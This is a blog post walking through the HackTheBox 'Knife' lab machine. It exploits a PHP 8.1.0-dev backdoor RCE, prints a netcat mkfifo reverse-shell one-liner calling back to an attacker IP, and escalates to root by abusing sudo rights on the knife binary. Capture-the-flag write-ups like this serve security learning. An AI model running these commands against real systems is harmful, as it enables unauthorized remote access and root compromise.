<!DOCTYPE html><html lang="en-US" mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="day-prompt" content="days ago"><meta name="hour-prompt" content="hours ago"><meta name="minute-prompt" content="minutes ago"><meta name="justnow-prompt" content="just now"><meta name="generator" content="Jekyll v4.2.1" /><meta property="og:title" content="HackTheBox[KNIFE]" /><meta name="author" content="Anurag M" /><meta property="og:locale" content="en_US" /><meta name="description" content="Cyber Security Blogs by Anurag M" /><meta property="og:description" content="Cyber Security Blogs by Anurag M" /><link rel="canonical" href="/posts/HackTheBox-KNIFE/" /><meta property="og:url" content="/posts/HackTheBox-KNIFE/" /><meta property="og:site_name" content="V1NC1D4" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-08-28T12:00:00+05:30" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="HackTheBox[KNIFE]" /><meta name="twitter:site" content="@v1nc1d4" /><meta name="twitter:creator" content="@Anurag M" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"author":{"@type":"Person","name":"Anurag M"},"description":"Cyber Security Blogs by Anurag M","url":"/posts/HackTheBox-KNIFE/","@type":"BlogPosting","headline":"HackTheBox[KNIFE]","dateModified":"2021-08-28T17:36:48+05:30","datePublished":"2021-08-28T12:00:00+05:30","mainEntityOfPage":{"@type":"WebPage","@id":"/posts/HackTheBox-KNIFE/"},"@context":"https://schema.org"}</script><title>HackTheBox[KNIFE] | V1NC1D4</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="V1NC1D4"><meta name="application-name" content="V1NC1D4"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="https://www.google-analytics.com" crossorigin="use-credentials"><link rel="dns-prefetch" href="https://www.google-analytics.com"><link rel="preconnect" href="https://www.googletagmanager.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://www.googletagmanager.com"><link rel="preconnect" href="https://cdn.jsdelivr.net"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1.1.0/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column align-items-end" lang="en"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" alt="avatar" class="mx-auto"> <img src="/assets/img/commons/avatar.jpg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">V1NC1D4</a></div><div class="site-subtitle font-italic">Artist | Designer</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tags ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center"> <a href="https://github.com/v1nc1d4" aria-label="github" target="_blank" rel="noopener"> <i class="fab fa-github-alt"></i> </a> <a href="https://twitter.com/v1nc1d4" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a> <a href=" javascript:location.href = 'mailto:' + ['hello','vincida.me'].join('@')" aria-label="email" > <i class="fas fa-envelope"></i> </a> <a href="/feed.xml" aria-label="rss" > <i class="fas fa-rss"></i> </a></div></div><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>HackTheBox[KNIFE]</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>HackTheBox[KNIFE]</h1><div class="post-meta text-muted d-flex flex-column"><div> <span class="semi-bold"> Anurag M </span> on <span class="timeago " data-toggle="tooltip" data-placement="bottom" title="Sat, Aug 28, 2021, 12:00 PM +0530" >Aug 28, 2021<i class="unloaded">2021-08-28T12:00:00+05:30</i> </span></div><div> <span> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sat, Aug 28, 2021, 12:06 PM +0000" >Aug 28, 2021<i class="unloaded">2021-08-28T17:36:48+05:30</i> </span> </span> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="626 words">3 min read</span></div></div><div class="post-content"><p><img data-proofer-ignore data-src="https://raw.githubusercontent.com/vincidadesigns/vincidadesigns.github.io/main/assets/img/posts/knife.png" alt="knife" /></p><p>In this blog, we are going to discuss about pwning knife from hackthebox.</p><h2 id="about-the-machine">About The Machine</h2><div class="table-wrapper"><table><thead><tr><th>Name<th>OS<th>Difficulty<th>Creator<tbody><tr><td><a href="https://www.hackthebox.eu/home/machines/profile/347">Knife</a><td>Linux<td>Easy<td><a href="https://www.hackthebox.eu/home/users/profile/98767">MrKN16H7</a></table></div><div class="table-wrapper"><table><thead><tr><th>Blood<th>User<tbody><tr><td>User<td><a href="https://www.hackthebox.eu/home/users/profile/77141">JKR</a><tr><td>Root<td><a href="https://www.hackthebox.eu/home/users/profile/77141">JKR</a></table></div><h2 id="reconnaissance">Reconnaissance</h2><h3 id="nmap">Nmap</h3><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>┌─[v1nc1d4@V1NC1D4]─[~/Desktop/HTB/LAB/knife]
└──╼ <span class="nv">$nmap</span> <span class="nt">-A</span> <span class="nt">-v</span> 10.10.10.242                                                                           
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 <span class="o">(</span>RSA<span class="o">)</span>
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    Apache httpd 2.4.41 <span class="o">((</span>Ubuntu<span class="o">))</span>
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p>From the Nmap scan, we can see that 2 ports are open. Port 22 and 80, which are standard SSH, HTTP ports respectively. Port 22 ie, SSH port needs a username and password, we do not have that (assuming brute force is not an option). Port 80 is for web applications. We can find something interesting in port 80, HTTP methods. You can read more about OPTIONS method <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS">here</a></p><p>Since this is related to HTTP methods, we can use the <code class="language-plaintext highlighter-rouge">curl</code> command-line program to issue an OPTION request.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌─[v1nc1d4@V1NC1D4]─[~/Desktop/HTB/LAB/knife]
└──╼ <span class="nv">$curl</span> <span class="nt">-X</span> OPTIONS http://10.10.10.242 <span class="nt">-i</span>
HTTP/1.1 200 OK
Date: Mon, 24 May 2021 00:20:43 GMT
Server: Apache/2.4.41 <span class="o">(</span>Ubuntu<span class="o">)</span>
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html<span class="p">;</span> <span class="nv">charset</span><span class="o">=</span>UTF-8
</pre></table></code></div></div><p>We have an interesting information for <code class="language-plaintext highlighter-rouge">X-Powered-By</code></p><p><code class="language-plaintext highlighter-rouge">X-Powered-By: PHP/8.1.0-dev</code></p><p>We have an impressive PHP bug, a quick reserch on google, we could find that it is vulnerable to Remote Code Execution. The exploit is availble in <a href="https://www.exploit-db.com/">exploit db</a>.</p><p>Download the <a href="https://www.exploit-db.com/exploits/49933">Exploit</a></p><p><img data-proofer-ignore data-src="https://raw.githubusercontent.com/vincidadesigns/vincidadesigns.github.io/main/assets/img/posts/exploit.png" alt="img" /></p><h2 id="gaining-foothold">Gaining foothold</h2><p>Let’s use the exploit. It will ask us for the target URL, as we append the target URL in the exploit, we will get shell as user.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌─[v1nc1d4@V1NC1D4]─[~/Desktop/HTB/LAB/knife]
└──╼ <span class="nv">$python3</span> exploit.py
Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/ 
Can<span class="s1">'t acces tty; job crontol turned off.
$ id
uid=1000(james) gid=1000(james) groups=1000(james)
</span></pre></table></code></div></div><p>We do not have a stable shell. Let’s take a reliable reverse shell.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>┌─[v1nc1d4@V1NC1D4]─[~/Desktop/HTB/LAB/knife]
└──╼ <span class="nv">$python3</span> exploit.py
Enter the full host url:
http://10.10.10.242/

Interactive shell is opened on http://10.10.10.242/ 
Can<span class="s1">'t acces tty; job crontol turned off.
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.10.14.15 4444 &gt;/tmp/f
</span></pre></table></code></div></div><p>Start netcat listener on the specified port, we get a reliable reverse shell. Upgrade to a stable shell.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>┌─[v1nc1d4@V1NC1D4]─[~/Desktop/HTB/LAB/knife]
└──╼ <span class="nv">$nc</span> <span class="nt">-nlvp</span> 4444
listening on <span class="o">[</span>any] 4444 ...
connect to <span class="o">[</span>10.10.14.15] from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.242] 48310
/bin/sh: 0: can<span class="s1">'t access tty; job control turned off
$ python3 -c '</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">"bin/bash"</span><span class="o">)</span><span class="s1">'
james@knife:/$ export TERM=xterm
export TERM=xterm
james@knife:/$ 
</span></pre></table></code></div></div><p>we can find the user flag under the directory <code class="language-plaintext highlighter-rouge">/home/james</code></p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">pwd
pwd</span>
/home/james
james@knife:~<span class="nv">$ </span><span class="nb">ls
ls
</span>user.txt
james@knife:~<span class="nv">$ </span>
</pre></table></code></div></div><h2 id="privilege-escalation">Privilege Escalation</h2><p>Let’s move forward, checking sudo rights we can find that user <code class="language-plaintext highlighter-rouge">james</code> is allowed to run /usr/bin/knife as root.</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">sudo</span> <span class="nt">-l</span>
<span class="nb">sudo</span> <span class="nt">-l</span>
Matching Defaults entries <span class="k">for </span>james on knife:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User james may run the following commands on knife:
    <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/knife
james@knife:~<span class="nv">$ </span>
</pre></table></code></div></div><p>Let’s see what <a href="https://gtfobins.github.io">gtfobins</a> have to say about <code class="language-plaintext highlighter-rouge">knife</code></p><p><img data-proofer-ignore data-src="https://raw.githubusercontent.com/vincidadesigns/vincidadesigns.github.io/main/assets/img/posts/knife-gtfobin.png" alt="img" /></p><p>Let’s get the root shell</p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>james@knife:~<span class="nv">$ </span><span class="nb">sudo</span> /usr/bin/knife <span class="nb">exec</span> <span class="nt">-E</span> <span class="s1">'exec "/bin/sh"'</span>                               
<span class="nb">sudo</span> /usr/bin/knife <span class="nb">exec</span> <span class="nt">-E</span> <span class="s1">'exec "/bin/sh"'</span>
<span class="c"># id</span>
<span class="nb">id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
<span class="c"># </span>
</pre></table></code></div></div><p>Root flag can be found under the directory <code class="language-plaintext highlighter-rouge">/root</code></p><div lang="bash" class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="c"># cd /root</span>
<span class="nb">cd</span> /root
<span class="c"># ls</span>
<span class="nb">ls
</span>delete.sh  root.txt  snap
<span class="c"># </span>
</pre></table></code></div></div><h2 id="resources">Resources</h2><div class="table-wrapper"><table><thead><tr><th>Topic<th>Url<tbody><tr><td>HTTP OPTION Methods<td><a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/OPTIONS">Click here</a><tr><td>Exploit<td><a href="https://www.exploit-db.com/exploits/49933">Click here</a><tr><td>GTFOBins-knife<td><a href="https://gtfobins.github.io/gtfobins/knife/#sudo">Click here</a></table></div></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>HackTheBox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/hackthebox/" class="post-tag no-text-decoration" >hackthebox</a> <a href="/tags/sudo/" class="post-tag no-text-decoration" >sudo</a> <a href="/tags/knife/" class="post-tag no-text-decoration" >knife</a> <a href="/tags/php/" class="post-tag no-text-decoration" >php</a> <a href="/tags/gtfobin/" class="post-tag no-text-decoration" >gtfobin</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/"> CC BY 4.0 </a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=HackTheBox[KNIFE] - V1NC1D4&url=/posts/HackTheBox-KNIFE/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=HackTheBox[KNIFE] - V1NC1D4&u=/posts/HackTheBox-KNIFE/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=HackTheBox[KNIFE] - V1NC1D4&url=/posts/HackTheBox-KNIFE/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink('', 'Link copied successfully!')" data-toggle="tooltip" data-placement="top" title="Copy link"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/HackTheBox-BACKDOOR/">HackTheBox[BACKDOOR]</a><li><a href="/posts/HackTheBox-BOUNTYHUNTER/">HackTheBox[BOUNTYHUNTER]</a><li><a href="/posts/HackTheBox-DOCTOR/">HackTheBox[DOCTOR]</a><li><a href="/posts/HackTheBox-KNIFE/">HackTheBox[KNIFE]</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/offsec-pg/">offsec-pg</a> <a class="post-tag" href="/tags/base32/">base32</a> <a class="post-tag" href="/tags/brute-force/">brute-force</a> <a class="post-tag" href="/tags/capabilities/">capabilities</a> <a class="post-tag" href="/tags/dd/">dd</a> <a class="post-tag" href="/tags/eval/">eval()</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/HackTheBox-DOCTOR/"><div class="card-body"> <span class="timeago small" >Feb 5, 2021<i class="unloaded">2021-02-05T22:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox[DOCTOR]</h3><div class="text-muted small"><p> Doctor is an easy rated CTF style machine at Hackthebox, featuring Server Side Template Injection(SSTI) and privilege escalation by exploiting Splunk Universal Forwarder. About The Machine ...</p></div></div></a></div><div class="card"> <a href="/posts/HackTheBox-BOUNTYHUNTER/"><div class="card-body"> <span class="timeago small" >Nov 20, 2021<i class="unloaded">2021-11-20T07:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox[BOUNTYHUNTER]</h3><div class="text-muted small"><p> BountyHunter is an easy rated CTF style machine at Hackthebox, the machine focuses on XXE (XML External Entity) injection to gain initial access to the machine and for escalating privilege to roo...</p></div></div></a></div><div class="card"> <a href="/posts/HackTheBox-BACKDOOR/"><div class="card-body"> <span class="timeago small" >Nov 22, 2021<i class="unloaded">2021-11-22T00:00:00+05:30</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>HackTheBox[BACKDOOR]</h3><div class="text-muted small"><p> When a door closes, another opens…. At least for #hackers Backdoor #Easy #Linux Machine created by hkabubaker17 About The Machine Name OS Difficulty Creator ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/HackTheBox-DOCTOR/" class="btn btn-outline-primary" prompt="Older"><p>HackTheBox[DOCTOR]</p></a> <a href="/posts/TryHackMe-URANIUM-CTF/" class="btn btn-outline-primary" prompt="Newer"><p>TryHackMe[URANIUM CTF]</p></a></div></div></div></div><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/v1nc1d4">Anurag M</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/hackthebox/">hackthebox</a> <a class="post-tag" href="/tags/suid/">SUID</a> <a class="post-tag" href="/tags/gobuster/">gobuster</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/offsec-pg/">offsec pg</a> <a class="post-tag" href="/tags/base32/">base32</a> <a class="post-tag" href="/tags/brute-force/">brute force</a> <a class="post-tag" href="/tags/capabilities/">capabilities</a> <a class="post-tag" href="/tags/dd/">dd</a> <a class="post-tag" href="/tags/eval/">eval()</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/lozad/dist/lozad.min.js,npm/magnific-popup@1/dist/jquery.magnific-popup.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/popper.js@1.16.1,npm/bootstrap@4/dist/js/bootstrap.min.js"></script> <script defer src="/app.js"></script> <script defer src="https://www.googletagmanager.com/gtag/js?id=G-H1DGTBDGQ7"></script> <script> document.addEventListener("DOMContentLoaded", function(event) { window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-H1DGTBDGQ7'); }); </script>
